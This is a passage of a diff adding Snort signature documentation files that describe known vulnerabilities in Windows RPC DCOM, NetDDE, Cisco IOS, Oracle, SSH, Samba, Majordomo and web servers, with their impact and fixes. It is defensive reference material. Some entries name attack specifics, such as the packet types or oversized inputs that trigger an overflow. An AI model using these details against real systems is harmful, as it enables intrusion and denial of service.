+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1825.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1825
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2969.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2969
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/2187.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+2187
+
+--
+Summary:
+This event is generated when a suspicious packet using an unusual 
+protocol is sent to a router.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in multiple Cisco IOS versions such that a Denial
+of Service condition can be issued against a device by sending multiple 
+packets using IP protocols 53, 55, 77 and 103 directly to that device.
+
+Cisco IOS processes these packets and under certain circumstances, can 
+be made to incorrectly flag an input interface as being full.
+
+--
+Affected Systems:
+Multiple versions of Cisco IOS.
+
+--
+Attack Scenarios:
+An attacker may send a large number of IP packets using one of the 
+protocols 53, 55, 77 or 103 directly to a router. Exploit code exists.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1504.txt
@@ -0,0 +1,53 @@
+Rule:  
+
+--
+Sid:
+1504
+
+--
+Summary:
+This event is generated when an attempt is made to access AFS from a source outside the protected network.
+
+--
+Impact:
+Serious. Unauthorized file access.
+
+--
+Detailed Information:
+The Andrew File System (AFS) is a popular networked file system much like NFS, it is often used in the enterprise or by educational institutions. 
+
+AFS utilises an Access Control List (ACL) to determine which hosts or networks are allowed to connect to the resources in the system. Misconfigured ACLs may allow an attacker to gain critical information.
+
+--
+Attack Scenarios:
+Badly configured ACL's allow an attacker that has access to the AFS service to read critical files and even upload files.
+
+--
+Ease of Attack:
+Simple. No exploit code is needed.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Use a packet filtering firewall to prevent unknown hosts from accessing the AFS service
+
+--
+Contributors:
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/825.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+825
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/984.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+984
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2454.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+2454
+
+--
+Summary:
+This event is generated when a host in your network that has Yahoo Instant Messenger running has successfully logged on to a Yahoo IM conference.
+
+--
+Impact:
+Possible policy violation.  Instant Messenger programs may not be appropriate in certain network environments.
+
+--
+Detailed Information:
+A Yahoo IM conference allows multiple users to participate in the exchange of text and voice messages, as well as share files and webcams.  It is possible that a file that is exchanged may contain malicious code such as as virus, worm, Trojan, or backdoor.  Also, since all exchanges are done via Yahoo IM servers and in clear text, there should be no expectation of privacy.
+
+--
+Affected Systems:
+Any host running Yahoo Instant Messenger.
+
+--
+Attack Scenarios:
+A Yahoo IM user may unwittingly accept a malicious file.
+
+--
+Ease of Attack:
+Easy to transfer a malicious file.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+It may be possible for Yahoo IM traffic to use other ports than the default expected ones.  
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+--
+Additional References:
+Yahoo Protocol
+http://www.cse.iitb.ac.in/~varunk/YahooProtocol.htm
+
+--
--- /dev/null
+++ b/doc/signatures/823.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+823
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2896.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2896
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_priority_site
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1128.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1128
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/255.txt
@@ -0,0 +1,61 @@
+Rule:
+--
+Sid:
+255
+
+--
+
+Summary:
+This event is generated when an attempt is made to request a zone 
+transfer from a DNS Server
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+DNS Zone transfers are normally used between DNS Servers to replicate 
+zone information. Zone transfers can also be used to gain information 
+about a network.
+
+--
+Affected Systems:
+	All DNS Servers
+
+--
+Attack Scenarios:
+A malicious user may request a Zone Transfer to gather information 
+before commencing an attack.  This can give the user a list of hosts to 
+target.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+DNS Zone transfers may be part of normal traffic for DNS servers.
+
+--
+False Negatives:  
+None known
+
+--
+Corrective Action:
+Configure the DNS servers to only allow zone transfers from authorised 
+hosts, limit the information available from publicly acessible DNS 
+server by using Split Horizon DNS or separate DNS Servers for internal 
+networks.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2948.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2948
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/100000669.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000669
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "headlines.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "headlines.php" script 
+used by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/465.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+465
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running the Internet Security Scanner tool.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running Internet Security Scanner "pinger" software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS158
+
+--
--- /dev/null
+++ b/doc/signatures/2911.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2911
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure refresh_snapshot_repschema
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2909.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2909
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_snapshot_support
+. This procedure is included in
+sys.dbms_repcat_sna.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1324.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1324
+
+--
+Summary:
+Secure Shell (SSH) is used to remotely manage systems over encrypted TCP
+sessions. This event is generated when an attempt is made to exploit 
+vulnerable versions of the SSH daemon.
+
+--
+Impact:
+System compromize presenting the attacker with root privileges. Denial 
+of Service (DoS) on certain network devices.
+
+--
+Detailed Information:
+A flaw in the CRC32 compensation attack detection code may result in 
+arbitrary code execution with the privileges of the user running the SSH
+daemon (usually root).
+
+Some Netscreen devices may suffer a Denial of Service.
+
+Affected Systems:
+	OpenSSH versions prior to 2.2
+	Multiple Cisco network devices
+	Multiple Netscreen network devices
+	SSH Secure Communications prior to 1.2.31
+
+--
+Attack Scenarios:
+The attacker would need to send specially crafted large SSH packets to 
+cause the overflow and present the opportunity to write values to memory
+locations.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/945216
+
+Analysis by David Dittrich:
+http://staff.washington.edu/dittrich/misc/ssh-analysis.txt
+
+--
--- /dev/null
+++ b/doc/signatures/3025.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3025
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2674.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2674
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_delete_resolution
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/661.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+661
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a problem with Majordomo software that allows arbitrary commands to be executed on the server.
+
+--
+Impact:
+Attempted administrator access.  This is an attempt to execute a command on a server where Majordomo is installed. 
+
+--
+Detailed Information:
+Majordomo is an application that automates mailing list management.  An input validation error allows attackers to use a malformed email header as a command that will be executed on the host.  To be vulnerable, the server must use a list or a hidden list and the configuration file must specify an advertise or noadvertise option.  This has been documented as either a local or remote attack on the host. 
+
+--
+Affected Systems:
+Majordomo versions up to and including 1.94.4.
+
+--
+Attack Scenarios:
+An attacker can send a malformed e-mail header to the Majordomo host.  The host executes a command that facilitates access to the host.
+
+
+--
+Ease of Attack:
+Simple. Use an appropriate malformed header and supply a command that enables access to the host. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to Majordomo version 1.94.5 or higher.
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2310
+
+Arachnids:
+http://www.whitehats.com/info/IDS143
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0207
+
+
+--
--- /dev/null
+++ b/doc/signatures/2558.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2558
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
